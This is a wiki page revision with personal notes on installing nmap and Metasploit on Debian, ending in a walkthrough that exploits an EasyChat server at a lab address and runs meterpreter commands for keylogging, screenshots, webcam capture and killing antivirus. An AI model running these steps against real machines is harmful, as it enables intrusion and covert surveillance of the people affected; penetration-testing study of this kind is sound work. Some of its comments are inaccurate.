Difference between revisions of "Cloud Security"
(8 intermediate revisions by the same user not shown) | |||
Line 7: | Line 7: | ||
<source> | <source> | ||
$ apt-get install nmap | $ apt-get install nmap | ||
+ | </source> | ||
+ | |||
+ | listen any port: | ||
+ | <source> | ||
+ | $ nmap -sV 192.168.56.1 | ||
</source> | </source> | ||
Line 14: | Line 19: | ||
* https://nmap.org/book/inst-linux.html#inst-rpm | * https://nmap.org/book/inst-linux.html#inst-rpm | ||
* https://wiki.debian.org/FreedomBox/Hardware/VirtualBox | * https://wiki.debian.org/FreedomBox/Hardware/VirtualBox | ||
+ | |||
+ | |||
+ | ==Installing Curl on Debian== | ||
+ | <source> | ||
+ | $ sudo apt install curl | ||
+ | </source> | ||
+ | |||
+ | ==How to Install [[Metasploit]] Framework on Ubuntu/Debian== | ||
+ | |||
+ | Download Metasploit installer using [[wget]] or [[curl]] command. | ||
+ | |||
+ | <source> | ||
+ | $ curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall | ||
+ | </source> | ||
+ | |||
+ | Once the script is downloaded, make it executable. | ||
+ | |||
+ | <source> | ||
+ | $ chmod +x msfinstall | ||
+ | </source> | ||
+ | |||
+ | Then execute the installer to install Metasploit Framework on Debian. | ||
+ | <source> | ||
+ | $ ./msfinstall | ||
+ | </source> | ||
+ | |||
+ | The installer script will add Metasploit Framework repository to your repository list and install all tools required. If you have slower internet, the download may take a while. | ||
+ | |||
+ | Check your Framework version using: | ||
+ | <source> | ||
+ | $ msfconsole --version | ||
+ | </source> | ||
+ | |||
+ | When installation is completed, create and initialize the msf database. | ||
+ | <source> | ||
+ | $ msfdb init | ||
+ | </source> | ||
+ | This will create an initial database schema, set service account and start services. Output similar to below should be printed. | ||
+ | |||
+ | Use printed credentials to access MSF Web Service & API. | ||
+ | |||
+ | <b>Launching msfconsole</b> | ||
+ | |||
+ | Now that database is initialized, you can launch msfconsole | ||
+ | <source> | ||
+ | $ msfconsole | ||
+ | </source> | ||
+ | |||
+ | Verify database connectivity with the db_status command as shown below. | ||
+ | <source> | ||
+ | $ msf6 > db_status | ||
+ | </source> | ||
+ | |||
+ | |||
+ | <b>Updating Metasploit Framework</b> | ||
+ | <source> | ||
+ | $ msfupdate | ||
+ | </source> | ||
+ | |||
+ | ===Usage=== | ||
+ | <source> | ||
+ | $ msfconsole | ||
+ | $ msf > search easychat | ||
+ | $ msf > use exploit/windows/http/efs_easychatserver_username | ||
+ | msf exploit(windows/http/efs_easychatserver_username) > show options | ||
+ | |||
+ | msf exploit(windows/http/efs_easychatserver_username) > set RHOST 192.168.56.1 | ||
+ | |||
+ | msf exploit(windows/http/efs_easychatserver_username) > exploit | ||
+ | |||
+ | meterpreter > ls | ||
+ | |||
+ | meterpreter > sysinfo | ||
+ | |||
+ | meterpreter > help | ||
+ | |||
+ | meterpreter > screenshot //to take a screenshot of the windows machine, we may use this command | ||
+ | |||
+ | meterpreter > keyscan_start //starts keylogger for the target port. | ||
+ | |||
+ | meterpreter > keyscan_dump //displays all of the keylogger logs | ||
+ | |||
+ | meterpreter > webcam_snap //it runs the webcam and takes a photo of the active user | ||
+ | |||
+ | meterpreter > kill xxx // i.e., you can kill a antivirus program | ||
+ | </source> | ||
+ | |||
+ | =Vulnerability Scanner= | ||
+ | ==Tools== | ||
+ | * https://www.tenable.com/products/nessus |
Latest revision as of 17:29, 9 January 2021
Contents
Notes
nmap installation/Debian Linux
Nmap ("Network Mapper") is a free and open source (license) utility for network discovery and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.
to install nmap on debian server:
$ apt-get install nmap
listen any port:
$ nmap -sV 192.168.56.1
resource:
- https://nmap.org
- https://nmap.org/book/inst-linux.html#inst-rpm
- https://wiki.debian.org/FreedomBox/Hardware/VirtualBox
Installing Curl on Debian
$ sudo apt install curl
How to Install Metasploit Framework on Ubuntu/Debian
Download Metasploit installer using wget or curl command.
$ curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
Once the script is downloaded, make it executable.
$ chmod +x msfinstall
Then execute the installer to install Metasploit Framework on Debian.
$ ./msfinstall
The installer script will add Metasploit Framework repository to your repository list and install all tools required. If you have slower internet, the download may take a while.
Check your Framework version using:
$ msfconsole --version
When installation is completed, create and initialize the msf database.
$ msfdb init
This will create an initial database schema, set service account and start services. Output similar to below should be printed.
Use printed credentials to access MSF Web Service & API.
Launching msfconsole
Now that database is initialized, you can launch msfconsole
$ msfconsole
Verify database connectivity with the db_status command as shown below.
$ msf6 > db_status
Updating Metasploit Framework
$ msfupdate
Usage
$ msfconsole
$ msf > search easychat
$ msf > use exploit/windows/http/efs_easychatserver_username
msf exploit(windows/http/efs_easychatserver_username) > show options
msf exploit(windows/http/efs_easychatserver_username) > set RHOST 192.168.56.1
msf exploit(windows/http/efs_easychatserver_username) > exploit
meterpreter > ls
meterpreter > sysinfo
meterpreter > help
meterpreter > screenshot //to take a screenshot of the windows machine, we may use this command
meterpreter > keyscan_start //starts keylogger for the target port.
meterpreter > keyscan_dump //displays all of the keylogger logs
meterpreter > webcam_snap //it runs the webcam and takes a photo of the active user
meterpreter > kill xxx // i.e., you can kill a antivirus program